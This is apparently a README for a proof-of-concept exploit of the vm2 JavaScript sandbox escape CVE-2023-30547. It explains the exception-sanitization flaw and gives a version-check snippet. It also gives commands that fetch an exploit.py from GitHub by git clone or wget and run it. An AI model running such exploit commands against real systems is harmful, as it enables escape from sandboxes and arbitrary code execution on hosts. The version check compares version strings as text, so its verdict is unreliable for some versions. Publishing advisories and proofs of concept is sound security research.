PoC Exploit for VM2 Sandbox Escape Vulnerability
vm2 < 3.9.17 is vulnerable to arbitrary code execution due to a flaw in exception sanitization. Attackers can exploit this by triggering an unsanitized host exception within handleException(), enabling them to escape the sandbox and run arbitrary code in the host context.
run this on the sandbox to find whether the target is vulnerable or not.
const version = require("vm2/package.json").version;
if (version < "3.9.17") {
console.log("vulnerable!");
} else {
console.log("not vulnerable");
}git clone https://github.com/rvizx/CVE-2023-30547
cd CVE-2023-30547
python3 exploit.py
or
wget https://raw.githubusercontent.com/rvizx/CVE-2023-30547/main/exploit.py
python3 exploit.py
https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
Xion (SeungHyun Lee) of KAIST Hacking Lab